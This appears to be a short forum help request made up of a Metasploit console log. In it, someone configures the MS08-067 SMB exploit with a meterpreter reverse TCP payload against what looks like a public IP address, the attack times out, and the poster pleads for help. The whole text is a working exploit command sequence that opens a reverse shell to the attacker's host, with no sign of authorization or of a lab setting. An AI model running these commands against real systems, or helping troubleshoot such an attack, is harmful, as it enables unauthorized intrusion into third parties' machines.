msf exploit(ms08_067_netapi) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.2.1
lhost => 192.168.2.1
msf exploit(ms08_067_netapi) > set RHOST 41.228.72.143
RHOST => 41.228.72.143
msf exploit(ms08_067_netapi) > set RPORT 4444
RPORT => 4444
msf exploit(ms08_067_netapi) > exploit
[-] Handler failed to bind to 192.168.2.1:4444[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed: The connection timed out (41.228.72.143:4444).[*] Exploit completed, but no session was created
Plz Help Meeeee